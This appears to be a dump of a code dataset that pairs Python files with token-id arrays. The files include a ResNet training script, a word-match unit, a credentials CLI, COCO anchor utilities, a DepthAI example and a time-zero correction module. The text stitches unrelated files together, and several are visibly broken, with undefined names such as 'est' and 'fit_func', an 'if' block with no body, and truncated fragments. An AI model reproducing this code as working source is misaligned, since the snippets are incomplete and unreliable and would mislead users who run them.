    raise argparse.ArgumentTypeError('expected a boolean value, got %r' % value)


parser = argparse.ArgumentParser(description='Train ResNet on CIFAR10')
parser.add_argument('-n', '--number', type=int, default=20)
parser.add_argument('-b', '--batch-size', type=int, default=128)
parser.add_argument('-lr', '--learn_rate', type=float, default=0.1)
parser.add_argument('-sd', '--stochastic-depth', type=str, default=None)
# BUGFIX: these four previously used type=bool, which parsed any non-empty
# string (including 'False') as True.
parser.add_argument('-st', '--show-test', type=_str2bool, default=False)
parser.add_argument('-pa', '--pre-activated', type=_str2bool, default=False)
parser.add_argument('-hp', '--half-precision', type=_str2bool, default=False)
parser.add_argument('-yf', '--yellowfin', type=_str2bool, default=False)
parser.add_argument('-e', '--epochs', type=int, default=TOTAL_EPOCHS)
parser.add_argument('-ls', '--loss-scale', type=float, default=1)  # 1024 for half-precision

args = parser.parse_args()

# Decode the stochastic-depth spec: 'true' enables it with defaults,
# 'A-B' supplies a from/to range (presumably layer keep-probabilities —
# confirm against fasttrain.model.resnet).
stochastic_depth = None
if args.stochastic_depth:
    sd = args.stochastic_depth
    if sd == 'true':
        stochastic_depth = {}
    else:
        splitted = sd.split('-')
        stochastic_depth = {
            'from': float(splitted[0]),
            'to': float(splitted[1])
        }

batch_size = args.batch_size
n = args.number
pre_activated = args.pre_activated
base_lr = args.learn_rate
show_test = args.show_test
epochs = args.epochs
loss_scale = args.loss_scale

schedule = resnet_paper_schedule(batch_size=batch_size, yellow_fin=args.yellowfin, scale=epochs/TOTAL_EPOCHS)
net = ResNetCIFAR(n, pre_activated=pre_activated, stochastic_depth=stochastic_depth)
# Run label; the original had a misplaced ')' that left ls outside the
# ResNet(...) parentheses.
name = (f'ResNet({n}, lr={base_lr}, epochs={epochs}, pa={pre_activated}, '
        f'sd={args.stochastic_depth}, hp={args.half_precision}, '
        f'yf={args.yellowfin}, ls={args.loss_scale})')
train_on_cifar(net, schedule, batch_size=batch_size, name=name, show_test=show_test)
| [
37811,
198,
220,
220,
15069,
2177,
19013,
9414,
1299,
11,
264,
13,
81,
13,
78,
628,
220,
220,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
220,
220,
345,
743,
407,
779,
428,
2393,
2845,
... | 2.78 | 900 |
import numpy as np
from .unit import Unit
class WordExactMatch(Unit):
    """
    WordExactUnit Class.

    Process unit to get a binary match list of two word index lists. The
    word index list is the word representation of a text.

    Examples:
        >>> import pandas
        >>> input_ = pandas.DataFrame({
        ...     'text_left':[[1, 2, 3],[4, 5, 7, 9]],
        ...     'text_right':[[5, 3, 2, 7],[2, 3, 5]]}
        ... )
        >>> left_word_exact_match = WordExactMatch(
        ...     match='text_left', to_match='text_right'
        ... )
        >>> left_out = input_.apply(left_word_exact_match.transform, axis=1)
        >>> left_out[0]
        [0, 1, 1]
        >>> left_out[1]
        [0, 1, 0, 0]
        >>> right_word_exact_match = WordExactMatch(
        ...     match='text_right', to_match='text_left'
        ... )
        >>> right_out = input_.apply(right_word_exact_match.transform, axis=1)
        >>> right_out[0]
        [0, 1, 1, 0]
        >>> right_out[1]
        [0, 0, 1]

    """

    def __init__(
        self,
        match: str,
        to_match: str
    ):
        """
        Class initialization.

        :param match: the 'match' column name.
        :param to_match: the 'to_match' column name.
        """
        self._match = match
        self._to_match = to_match

    def transform(self, input_) -> list:
        """
        Transform two word index lists into a binary match list.

        :param input_: a dataframe row that includes the 'match' column
            and the 'to_match' column.

        :return: a binary match result list of two word index lists.
        """
        # PERF: build the membership set once. The original rebuilt
        # set(input_[self._to_match]) on every loop iteration, making the
        # transform O(len(match) * len(to_match)).
        to_match_set = set(input_[self._to_match])
        return [
            1 if word in to_match_set else 0
            for word in input_[self._match]
        ]
| [
11748,
299,
32152,
355,
45941,
198,
198,
6738,
764,
20850,
1330,
11801,
628,
198,
4871,
9678,
3109,
529,
23850,
7,
26453,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
9678,
3109,
529,
26453,
5016,
13,
628,
220,
220,
220,
10854... | 2.091916 | 903 |
import pickle
from pathlib import Path
import click
from click import ClickException
from omigami.authentication import encrypt_credentials
from omigami.omi_settings import get_credentials_path, get_credentials_folder_path
@click.command()
@click.option("--username", help="Your Omigami.com username")
@click.option("--password", help="Your Omigami.com password")
@click.option(
"--unset",
is_flag=True,
help="Remove previously setup credentials for the current user",
)
def credentials_helper(username, password, unset):
"""
CLI Helper for configuring the user machine to access the Omigami endpoints
"""
path = get_credentials_path()
Path(get_credentials_folder_path()).mkdir(parents=True, exist_ok=True)
if unset:
open(path, "w").close()
print("Crendetials successfully unset.")
return
if not username or not password:
raise ClickException(
"Please provide username and password using --username and --password arguments, "
"placing values between single quotes is recommended"
)
creds = encrypt_credentials(username, password)
with open(path, "wb") as file_handle:
pickle.dump(creds, file_handle, protocol=pickle.HIGHEST_PROTOCOL)
print("Crendetials successfully saved.")
@click.group()
omigami.add_command(credentials_helper)
| [
11748,
2298,
293,
198,
6738,
3108,
8019,
1330,
10644,
198,
198,
11748,
3904,
198,
6738,
3904,
1330,
6914,
16922,
198,
198,
6738,
39030,
328,
6277,
13,
41299,
3299,
1330,
34117,
62,
66,
445,
14817,
198,
6738,
39030,
328,
6277,
13,
12753,... | 2.867925 | 477 |
import moeda
moeda.limpar()
v = float(input('Digite um valor: R$ '))
print(f'Aumentando 10% temos: {moeda.aumentar(v, 10, True)}')
print(f'Diminuindo 20% temos: {moeda.diminuir(v, 20, True)}')
print(f'O dobro é {moeda.dobro(v, True)}')
print(f'A metade é {moeda.metade(v, True)}')
| [
11748,
6941,
18082,
198,
5908,
18082,
13,
2475,
1845,
3419,
198,
198,
85,
796,
12178,
7,
15414,
10786,
19511,
578,
23781,
1188,
273,
25,
371,
3,
705,
4008,
198,
198,
4798,
7,
69,
6,
32,
1713,
25440,
838,
4,
2169,
418,
25,
1391,
59... | 2.143939 | 132 |
import tensorflow as tf
import tensorflow_datasets as tfds
from tensorflow import keras
from keras_cv_attention_models.imagenet.data import init_mean_std_by_rescale_mode, random_crop_fraction
COCO_LABELS = """person, bicycle, car, motorcycle, airplane, bus, train, truck, boat, traffic light, fire hydrant, stop sign,
parking meter, bench, bird, cat, dog, horse, sheep, cow, elephant, bear, zebra, giraffe, backpack, umbrella, handbag, tie,
suitcase, frisbee, skis, snowboard, sports ball, kite, baseball bat, baseball glove, skateboard, surfboard, tennis racket,
bottle, wine glass, cup, fork, knife, spoon, bowl, banana, apple, sandwich, orange, broccoli, carrot, hot dog, pizza, donut,
cake, chair, couch, potted plant, bed, dining table, toilet, tv, laptop, mouse, remote, keyboard, cell phone, microwave, oven,
toaster, sink, refrigerator, book, clock, vase, scissors, teddy bear, hair drier, toothbrush"""
COCO_80_LABEL_DICT = {id: ii.strip() for id, ii in enumerate(COCO_LABELS.split(","))}
INVALID_ID_90 = [12, 26, 29, 30, 45, 66, 68, 69, 71, 83]
COCO_90_LABEL_DICT = {id: ii for id, ii in zip(set(range(90)) - set(INVALID_ID_90), COCO_80_LABEL_DICT.values())}
COCO_90_LABEL_DICT.update({ii: "Unknown" for ii in INVALID_ID_90})
COCO_80_to_90_LABEL_DICT = {id_80: id_90 for id_80, id_90 in enumerate(set(range(90)) - set(INVALID_ID_90))}
def get_anchors(input_shape=(512, 512, 3), pyramid_levels=[3, 7], aspect_ratios=[1, 2, 0.5], num_scales=3, anchor_scale=4, grid_zero_start=False):
"""
>>> from keras_cv_attention_models.coco import data
>>> input_shape = [512, 128]
>>> anchors = data.get_anchors([512, 128], pyramid_levels=[7])
>>> data.draw_bboxes(anchors * [512, 128, 512, 128])
grid_zero_start: grid starts from 0, else from strides // 2. False for efficientdet anchors, True for yolo anchors.
"""
# base anchors
scales = [2 ** (ii / num_scales) * anchor_scale for ii in range(num_scales)]
aspect_ratios = tf.convert_to_tensor(aspect_ratios, dtype="float32")
if len(aspect_ratios.shape) == 1:
# aspect_ratios = [0.5, 1, 2]
sqrt_ratios = tf.sqrt(aspect_ratios)
ww_ratios, hh_ratios = sqrt_ratios, 1 / sqrt_ratios
else:
# aspect_ratios = [(1, 1), (1.4, 0.7), (0.7, 1.4)]
ww_ratios, hh_ratios = aspect_ratios[:, 0], aspect_ratios[:, 1]
base_anchors_hh = tf.reshape(tf.expand_dims(scales, 1) * tf.expand_dims(hh_ratios, 0), [-1])
base_anchors_ww = tf.reshape(tf.expand_dims(scales, 1) * tf.expand_dims(ww_ratios, 0), [-1])
base_anchors_hh_half, base_anchors_ww_half = base_anchors_hh / 2, base_anchors_ww / 2
base_anchors = tf.stack([base_anchors_hh_half * -1, base_anchors_ww_half * -1, base_anchors_hh_half, base_anchors_ww_half], axis=1)
# base_anchors = tf.gather(base_anchors, [3, 6, 0, 4, 7, 1, 5, 8, 2]) # re-order according to official generated anchors
# make grid
pyramid_levels = list(range(min(pyramid_levels), max(pyramid_levels) + 1))
# https://github.com/google/automl/tree/master/efficientdet/utils.py#L509
feature_sizes = [input_shape[:2]]
for _ in range(max(pyramid_levels)):
pre_feat_size = feature_sizes[-1]
feature_sizes.append(((pre_feat_size[0] - 1) // 2 + 1, (pre_feat_size[1] - 1) // 2 + 1)) # ceil mode, like padding="SAME" downsampling
all_anchors = []
for level in pyramid_levels:
stride_hh, stride_ww = feature_sizes[0][0] / feature_sizes[level][0], feature_sizes[0][1] / feature_sizes[level][1]
top, left = (0, 0) if grid_zero_start else (stride_hh / 2, stride_ww / 2)
hh_centers = tf.range(top, input_shape[0], stride_hh)
ww_centers = tf.range(left, input_shape[1], stride_ww)
ww_grid, hh_grid = tf.meshgrid(ww_centers, hh_centers)
grid = tf.reshape(tf.stack([hh_grid, ww_grid, hh_grid, ww_grid], 2), [-1, 1, 4])
anchors = tf.expand_dims(base_anchors * [stride_hh, stride_ww, stride_hh, stride_ww], 0) + tf.cast(grid, base_anchors.dtype)
anchors = tf.reshape(anchors, [-1, 4])
all_anchors.append(anchors)
all_anchors = tf.concat(all_anchors, axis=0) / [input_shape[0], input_shape[1], input_shape[0], input_shape[1]]
# if width_first:
# all_anchors = tf.gather(all_anchors, [1, 0, 3, 2], axis=-1)
return all_anchors
def corners_to_center_xywh_nd(ss):
""" input: [top, left, bottom, right], output: [center_h, center_w], [height, width] """
return (ss[:, :2] + ss[:, 2:]) * 0.5, ss[:, 2:] - ss[:, :2]
def get_image_aspect_aware_random_scale_crop(source_shape, target_shape, scale_min=0.1, scale_max=2.0):
""" https://github.com/google/automl/tree/master/efficientdet/dataloader.py#L67 """
random_image_scale = get_random_image_scale(source_shape, target_shape, scale_min, scale_max)
# Select non-zero random offset (x, y) if scaled image is larger than self._output_size.
height, width = tf.cast(source_shape[0], tf.float32), tf.cast(source_shape[1], tf.float32)
scaled_height, scaled_width = height * random_image_scale, width * random_image_scale
offset_y, offset_x = tf.maximum(0.0, scaled_height - target_shape[0]), tf.maximum(0.0, scaled_width - target_shape[1])
random_offset_y, random_offset_x = offset_y * tf.random.uniform([], 0, 1), offset_x * tf.random.uniform([], 0, 1)
random_offset_y, random_offset_x = tf.cast(random_offset_y, tf.int32), tf.cast(random_offset_x, tf.int32)
return random_image_scale, random_offset_y, random_offset_x
| [
11748,
11192,
273,
11125,
355,
48700,
198,
11748,
11192,
273,
11125,
62,
19608,
292,
1039,
355,
48700,
9310,
198,
6738,
11192,
273,
11125,
1330,
41927,
292,
198,
6738,
41927,
292,
62,
33967,
62,
1078,
1463,
62,
27530,
13,
320,
11286,
31... | 2.424748 | 2,279 |
# Generated by Django 3.0.3 on 2021-03-22 08:32
from django.db import migrations, models
import django.utils.timezone
| [
2,
2980,
515,
416,
37770,
513,
13,
15,
13,
18,
319,
33448,
12,
3070,
12,
1828,
8487,
25,
2624,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
198,
11748,
42625,
14208,
13,
26791,
13,
2435,
11340,
628
] | 2.926829 | 41 |
#!/usr/bin/env python3
"""
This example shows usage of ImageManip to crop a rotated rectangle area on a frame,
or perform various image transforms: rotate, mirror, flip, perspective transform.
"""
import depthai as dai
import cv2
import numpy as np
keyRotateDecr = 'z'
keyRotateIncr = 'x'
keyResizeInc = 'v'
keyWarpTestCycle = 'c'
rotateRateMax = 5.0
rotateRateInc = 0.1
resizeMaxW = 800
resizeMaxH = 600
resizeFactorMax = 5
'''
The crop points are specified in clockwise order,
with first point mapped to output top-left, as:
P0 -> P1
^ v
P3 <- P2
'''
P0 = [0, 0] # top-left
P1 = [1, 0] # top-right
P2 = [1, 1] # bottom-right
P3 = [0, 1] # bottom-left
warpList = [
# points order, normalized cordinates, description
# [[[0, 0], [1, 0], [1, 1], [0, 1]], True, "passthrough"],
# [[[0, 0], [639, 0], [639, 479], [0, 479]], False, "passthrough (pixels)"],
[[P0, P1, P2, P3], True, "1. passthrough"],
[[P3, P0, P1, P2], True, "2. rotate 90"],
[[P2, P3, P0, P1], True, "3. rotate 180"],
[[P1, P2, P3, P0], True, "4. rotate 270"],
[[P1, P0, P3, P2], True, "5. horizontal mirror"],
[[P3, P2, P1, P0], True, "6. vertical flip"],
[[[-0.1, -0.1], [1.1, -0.1], [1.1, 1.1], [-0.1, 1.1]], True, "7. add black borders"],
[[[-0.3, 0], [1, 0], [1.3, 1], [0, 1]], True, "8. parallelogram transform"],
[[[-0.2, 0], [1.8, 0], [1, 1], [0, 1]], True, "9. trapezoid transform"],
]
# Create pipeline
pipeline = dai.Pipeline()
# Define sources and outputs
camRgb = pipeline.createColorCamera()
manip = pipeline.createImageManip()
camOut = pipeline.createXLinkOut()
manipOut = pipeline.createXLinkOut()
manipCfg = pipeline.createXLinkIn()
camOut.setStreamName("preview")
manipOut.setStreamName("manip")
manipCfg.setStreamName("manipCfg")
# Properties
camRgb.setPreviewSize(640, 480)
camRgb.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
camRgb.setInterleaved(False)
camRgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.BGR)
manip.setMaxOutputFrameSize(2000 * 1500 * 3)
# Linking
camRgb.preview.link(camOut.input)
camRgb.preview.link(manip.inputImage)
manip.out.link(manipOut.input)
manipCfg.out.link(manip.inputConfig)
# Connect to device and start pipeline
with dai.Device(pipeline) as device:
# Create input & output queues
qPreview = device.getOutputQueue(name="preview", maxSize=4)
qManip = device.getOutputQueue(name="manip", maxSize=4)
qManipCfg = device.getInputQueue(name="manipCfg")
key = -1
angleDeg = 0
rotateRate = 1.0
resizeFactor = 0
resizeX = 0
resizeY = 0
testFourPt = False
warpIdx = -1
printControls()
while key != ord('q'):
if key > 0:
print("Pressed: ", key)
if key == ord(keyRotateDecr) or key == ord(keyRotateIncr):
if key == ord(keyRotateDecr):
if rotateRate > -rotateRateMax:
rotateRate -= rotateRateInc
if key == ord(keyRotateIncr):
if rotateRate < rotateRateMax:
rotateRate += rotateRateInc
testFourPt = False
print("Crop rotated rectangle, rate per frame: {:.1f} degrees".format(rotateRate))
elif key == ord(keyResizeInc):
resizeFactor += 1
if resizeFactor > resizeFactorMax:
resizeFactor = 0
print("Crop region not resized")
else:
resizeX = resizeMaxW // resizeFactor
resizeY = resizeMaxH // resizeFactor
print("Crop region resized to: ", resizeX, 'x', resizeY)
elif key == ord(keyWarpTestCycle):
# Disable resizing initially
resizeFactor = 0
warpIdx = (warpIdx + 1) % len(warpList)
testFourPt = True
testDescription = warpList[warpIdx][2]
print("Warp 4-point transform: ", testDescription)
elif key == ord('h'):
printControls()
# Send an updated config with continuous rotate, or after a key press
if key >= 0 or (not testFourPt and abs(rotateRate) > 0.0001):
cfg = dai.ImageManipConfig()
if testFourPt:
test = warpList[warpIdx]
points, normalized = test[0], test[1]
point2fList = []
for p in points:
pt = dai.Point2f()
pt.x, pt.y = p[0], p[1]
point2fList.append(pt)
cfg.setWarpTransformFourPoints(point2fList, normalized)
else:
angleDeg += rotateRate
rotatedRect = ((320, 240), (400, 400), angleDeg)
rr = dai.RotatedRect()
rr.center.x, rr.center.y = rotatedRect[0]
rr.size.width, rr.size.height = rotatedRect[1]
rr.angle = rotatedRect[2]
cfg.setCropRotatedRect(rr, False)
if resizeFactor > 0:
cfg.setResize(resizeX, resizeY)
# cfg.setWarpBorderFillColor(255, 0, 0)
# cfg.setWarpBorderReplicatePixels()
qManipCfg.send(cfg)
for q in [qPreview, qManip]:
pkt = q.get()
name = q.getName()
shape = (3, pkt.getHeight(), pkt.getWidth())
frame = pkt.getCvFrame()
if name == "preview" and not testFourPt:
# Draw RotatedRect cropped area on input frame
points = np.int0(cv2.boxPoints(rotatedRect))
cv2.drawContours(frame, [points], 0, (255, 0, 0), 1)
# Mark top-left corner
cv2.circle(frame, tuple(points[1]), 10, (255, 0, 0), 2)
cv2.imshow(name, frame)
key = cv2.waitKey(1)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
37811,
198,
1212,
1672,
2523,
8748,
286,
7412,
5124,
541,
284,
13833,
257,
38375,
35991,
1989,
319,
257,
5739,
11,
198,
273,
1620,
2972,
2939,
31408,
25,
23064,
11,
10162,
11,... | 2.025216 | 2,895 |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import json
import azure.functions as func
| [
2,
15069,
357,
66,
8,
5413,
10501,
13,
1439,
2489,
10395,
13,
198,
2,
49962,
739,
262,
17168,
13789,
13,
198,
11748,
33918,
198,
11748,
35560,
495,
13,
12543,
2733,
355,
25439,
628
] | 4.181818 | 33 |
from functools import partial
from lazy import lazy
from ploy.common import BaseMaster, BaseInstance
from ploy.common import SSHKeyFingerprint
from ploy.common import SSHKeyFingerprintAsk
from ploy.common import SSHKeyFingerprintIgnore
from ploy.common import SSHKeyFingerprintInstance
from ploy.common import SSHKeyInfo
from ploy.common import import_paramiko
from ploy.common import parse_fingerprint, parse_ssh_keygen
import getpass
import hashlib
import logging
import os
import re
import socket
import subprocess
import sys
log = logging.getLogger('ploy')
plugin = dict(
get_massagers=get_massagers,
get_masters=get_masters)
| [
6738,
1257,
310,
10141,
1330,
13027,
198,
6738,
16931,
1330,
16931,
198,
6738,
46945,
13,
11321,
1330,
7308,
18254,
11,
7308,
33384,
198,
6738,
46945,
13,
11321,
1330,
33825,
9218,
37,
3889,
4798,
198,
6738,
46945,
13,
11321,
1330,
33825,... | 3.565934 | 182 |
# -*- coding: utf-8 -*-
"""
Contains functions to find the time-zero and to interpolate the data.
"""
import numpy as np
import skultrafast.dv as dv
import scipy.ndimage as nd
import matplotlib.pyplot as plt
#from skultrafast.fitter import _coh_gaussian
from scipy.linalg import lstsq
from scipy.optimize import least_squares
@dv.add_to_cls(est)
def use_gaussian(dat, sigma=1):
"""
Use convolution with the derivate of an gaussian.
"""
derivate = nd.gaussian_filter(dat, (sigma, 0), 1)
return np.argmax(np.abs(derivate), 0)
@dv.add_to_cls(est)
def use_diff(dat, smooth=0):
"""
Use numerical diff.
"""
if smooth != 0:
dat = nd.gaussian_filter(dat, smooth)
derivate = np.diff(dat, 1, 0)
return np.argmax(np.abs(derivate), 0)
@dv.add_to_cls(est)
def use_sv_filter(dat, window=7, polydeg=5):
"""
Use savitzky-golay derivate.
"""
out = np.zeros((dat.shape[1]))
for i in range(dat.shape[1]):
idx = np.argmax(dv.savitzky_golay(dat[:, i], window, polydeg, 1))
out[i] = idx
return out
@dv.add_to_cls(est)
def use_max(dat, use_abs=True):
"""
Uses the absolute maximum of the signal
"""
if use_abs:
dat = np.abs(dat)
return np.argmax(dat, 0)
@dv.add_to_cls(est)
def use_first_abs(dat, val=5):
"""
Returns the first index where abs(dat)>val.
"""
idx = np.abs(dat) > val
return np.argmax(idx, 0)
import scipy.optimize as opt
@dv.add_to_cls(est)
def use_fit(dat, t, tau=[5, 20000], w0=0.08, tn=None, n=-1):
"""
Fits each transient with only w and x0 free.
"""
out = np.zeros(dat.shape[1])
w_out = np.zeros(dat.shape[1])
t = t[:n]
o = tn[0]
w = w0
for i in range(dat.shape[1]):
y = dat[:n, i]
f = lambda p: _fit_func(t, y, -p[0], p[1], tau)
f_sum = lambda p: (f(p)**2).sum()
try:
if not np.isnan(o) and False:
k = o + np.diff(tn)[i]
else:
k = tn[i]
w = w0
#o, w = leastsq(f, list([k, w0]))[0][:2]
# = opt.minimize(f_sum, [k,w], method='BFGS')
#x = cma.fmin(f_sum, [o, w0], 0.03, bounds=[(0,0.04),(5, 0.2)], restarts=1, verb_log=0)
x = opt.brute(f_sum, (range((tn - 0.1),
(tn + 0.1), 0.01), np.range(0.04, 0.13, 0.01)))
o, w = x[0]
if abs(o - tn[i]) > 0.04:
plt.plot(t, f([o, w]) + y)
plt.plot(t, y, 'o')
except NameError:
o = w = np.NaN
out[i] = o
w_out[i] = w
return out, w_out
def _fit_func(t, y, x0, w, tau):
"""
Fit
"""
base = np.column_stack((
_fold_exp(t, w, x0, np.array(tau)).T, #))
_coh_gaussian(t, w, x0)))
base = np.nan_to_num(base)
c = lstsq(base, y[:, None])
y_fit = np.dot(base, c[0])
return (y_fit[:, 0] - y)
def robust_fit_tz(wl, tn, degree=3, t=1.345):
"""
Apply a robust 3-degree fit to given tn-indexs.
"""
powers = np.arange(degree + 1)
X = wl[:, None]**powers[None, :]
c = np.linalg.lstsq(X, tn, rcond=1e-10)[0]
o = least_squares(fit_func, c, loss='cauchy')
zeros = X @ o.x
return zeros, o.x[::-1]
def interpol(tup, tn, shift=0., new_t=None):
"""
Uses linear interpolation to shift each channcel by given tn.
"""
dat = tup.data
t = tup.t
if new_t is None:
new_t = t
#t_array = np.tile(t.reshape(t.size, 1), (1, dat.shape[1]))
t_array = t[:, None] - tn[None, :]
t_array -= shift
dat_new = np.zeros((new_t.size, dat.shape[1]))
for i in range(dat.shape[1]):
dat_new[:, i] = np.interp(new_t, t_array[:, i], dat[:, i], left=0)
return dv.tup(tup.wl, t, dat_new)
def get_tz_cor(tup, method=use_diff, deg=3, plot=False, **kwargs):
"""
Fully automatic timezero correction.
"""
idx = method(tup.data, **kwargs)
raw_tn = tup.t[idx]
no_nan = ~np.any(np.isnan(tup.data), 0)
fit, p = robust_fit_tz(tup.wl[no_nan], raw_tn[no_nan], deg)
#dv.subtract_background(tup.data, tup.t, fit, 400)
fit = np.polyval(p, tup.wl)
cor = interpol(tup, fit)
if plot:
from . import plot_funcs as pl
pl._plot_zero_finding(tup, raw_tn, fit, cor)
return cor, fit
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
4264,
1299,
5499,
284,
1064,
262,
640,
12,
22570,
290,
284,
39555,
378,
262,
1366,
13,
198,
37811,
198,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
1341,... | 1.891068 | 2,295 |
#######################################################################
# Tests for cmpdirs.py
#######################################################################
import unittest
import os
import tempfile
import shutil
from bcftbx.Md5sum import Md5Checker
from bcftbx.test.mock_data import TestUtils,ExampleDirLanguages
from cmpdirs import yield_filepairs
from cmpdirs import cmp_filepair
from cmpdirs import cmp_dirs
| [
29113,
29113,
4242,
21017,
198,
2,
30307,
329,
269,
3149,
15908,
82,
13,
9078,
198,
29113,
29113,
4242,
21017,
198,
198,
11748,
555,
715,
395,
198,
11748,
28686,
198,
11748,
20218,
7753,
198,
11748,
4423,
346,
198,
6738,
47125,
701,
65,... | 3.81982 | 111 |
from rubicon.repository.utils.slugify import slugify
__all__ = ["slugify"]
| [
6738,
6437,
4749,
13,
260,
1930,
37765,
13,
26791,
13,
6649,
1018,
1958,
1330,
31065,
1958,
198,
198,
834,
439,
834,
796,
14631,
6649,
1018,
1958,
8973,
198
] | 2.714286 | 28 |
#!/bin/python
import sys, numpy, os.path, re
import argparse
from Bio import SeqIO
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--library_file', help="File containing the library report generated by the script prepare_libraries.py")
parser.add_argument('-p', '--path', required=True, help="Path de Trimmomatic")
parser.add_argument('-j', '--job_output', required=True, help="This is where the script will create the job file")
parser.add_argument('-o', '--output', required=True, help="This where the job file will point for the output of trimmomatic")
parser.add_argument('-c', '--commands', default='LEADING:3 TRAILING:3 SLIDINGWINDOW:4:15 MINLEN:36', help='User defined commands for trimmomatic')
parser.add_argument('--remove_originals', action='store_true', default=False, help='After trimming the libraries it deletes the original untrimmed files. This option is off by default.')
args = parser.parse_args()
trimming (args.library_file, args.path, args.commands, args.job_output, args.output, args.remove_originals)
#for i in pacbio_list:
| [
2,
48443,
8800,
14,
29412,
198,
11748,
25064,
11,
299,
32152,
11,
28686,
13,
6978,
11,
302,
198,
11748,
1822,
29572,
198,
6738,
16024,
1330,
1001,
80,
9399,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,... | 3.116343 | 361 |
# -*- coding: utf-8 -*-
# @Author: amaneureka
# @Date: 2017-03-30 13:53:13
# @Last Modified by: amaneureka
# @Last Modified time: 2017-03-30 22:10:02
from dateutil import parser
from .. import app
@app.template_filter('strftime')
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
2488,
13838,
25,
716,
1531,
495,
4914,
198,
2,
2488,
10430,
25,
220,
220,
2177,
12,
3070,
12,
1270,
1511,
25,
4310,
25,
1485,
198,
2,
2488,
5956,
40499,
416,
25,
... | 2.510638 | 94 |
import argparse
if __name__ == "__main__":
myCli = EnjCLI()
myvars = myCli.create_parser()
print(myvars) | [
11748,
1822,
29572,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
616,
2601,
72,
796,
2039,
73,
5097,
40,
3419,
198,
220,
220,
220,
616,
85,
945,
796,
616,
2601,
72,
13,
17953,
62,
48610,
3... | 2.166667 | 54 |
from unittest import TestCase
from unittest.mock import patch
with patch('serial.Serial'):
from controls.valloxcontrol import ValloxControl
from valloxserial import vallox_serial
| [
6738,
555,
715,
395,
1330,
6208,
20448,
198,
6738,
555,
715,
395,
13,
76,
735,
1330,
8529,
198,
4480,
8529,
10786,
46911,
13,
32634,
6,
2599,
198,
220,
220,
220,
422,
6973,
13,
85,
439,
1140,
13716,
1330,
46929,
1140,
15988,
198,
67... | 3.407407 | 54 |
"""
Simple lock interface.
"""
import os
import time
from dataclasses import dataclass
from pathlib import Path
from fasteners import InterProcessLock
from dataladmetadatamodel.log import logger
PID = os.getpid()
GIT_MAPPER_LOCK_FILE_NAME = "metadata-model-git.lock"
read_write_locked = dict()
@dataclass
| [
37811,
198,
26437,
5793,
7071,
13,
198,
37811,
198,
11748,
28686,
198,
11748,
640,
198,
6738,
4818,
330,
28958,
1330,
4818,
330,
31172,
198,
6738,
3108,
8019,
1330,
10644,
198,
198,
6738,
3049,
36014,
1330,
4225,
18709,
25392,
198,
198,
... | 3.009524 | 105 |
import argparse
import sys
import csv
import os
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
BATCH = 1
NUM_GENES = 4
N1 = 91
EXPLICIT_NOISE_LEVEL = 0.05
FLAGS = None
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--output_name', type=int, default=1, help='***')
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| [
11748,
1822,
29572,
198,
11748,
25064,
198,
11748,
269,
21370,
198,
11748,
28686,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
11192,
273,
11125,
355,
48700,
628,
198,
33,
... | 2.60119 | 168 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from tkinter import Tk, Text, BOTH, DISABLED, NORMAL, END
APPNAME = "WRITER TEST"
WELCOME_MSG = "Welcome to {}\n".format(APPNAME)
ui = UI() | [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
6738,
256,
74,
3849,
1330,
309,
74,
11,
8255,
11,
347,
26946,
11,
13954,
6242,
30465,
11,
25273,
42126,
11,
23578,
198,... | 2.190476 | 84 |
# This file is generated by objective.metadata
#
# Last update: Mon Mar 16 08:52:15 2020
#
# flake8: noqa
import objc, sys
if sys.maxsize > 2 ** 32:
else:
misc = {}
misc.update(
{
"CFXMLEntityInfo": objc.createStructType(
"CFXMLEntityInfo",
sel32or64(
b"{_CFXMLEntityInfo=l^{__CFString=}{_CFXMLExternalID=^{__CFURL=}^{__CFString=}}^{__CFString=}}",
b"{_CFXMLEntityInfo=q^{__CFString=}{_CFXMLExternalID=^{__CFURL=}^{__CFString=}}^{__CFString=}}",
),
["entityType", "replacementText", "entityID", "notationName"],
),
"CFXMLElementInfo": objc.createStructType(
"CFXMLElementInfo",
b"{_CFXMLElementInfo=^{__CFDictionary=}^{__CFArray=}Z[3c]}",
["attributes", "attributeOrder", "isEmpty", "_reserved"],
),
"CFXMLAttributeListDeclarationInfo": objc.createStructType(
"CFXMLAttributeListDeclarationInfo",
sel32or64(
b"{_CFXMLAttributeListDeclarationInfo=l^{_CFXMLAttributeDeclarationInfo=^{__CFString=}^{__CFString=}^{__CFString=}}}",
b"{_CFXMLAttributeListDeclarationInfo=q^{_CFXMLAttributeDeclarationInfo=^{__CFString=}^{__CFString=}^{__CFString=}}}",
),
["numberOfAttributes", "attributes"],
),
"CFXMLElementTypeDeclarationInfo": objc.createStructType(
"CFXMLElementTypeDeclarationInfo",
b"{_CFXMLElementTypeDeclarationInfo=^{__CFString=}}",
["contentDescription"],
),
"CFGregorianDate": objc.createStructType(
"CFGregorianDate",
sel32or64(b"{_CFGregorianDate=lccccd}", b"{_CFGregorianDate=iccccd}"),
["year", "month", "day", "hour", "minute", "second"],
),
"CFXMLExternalID": objc.createStructType(
"CFXMLExternalID",
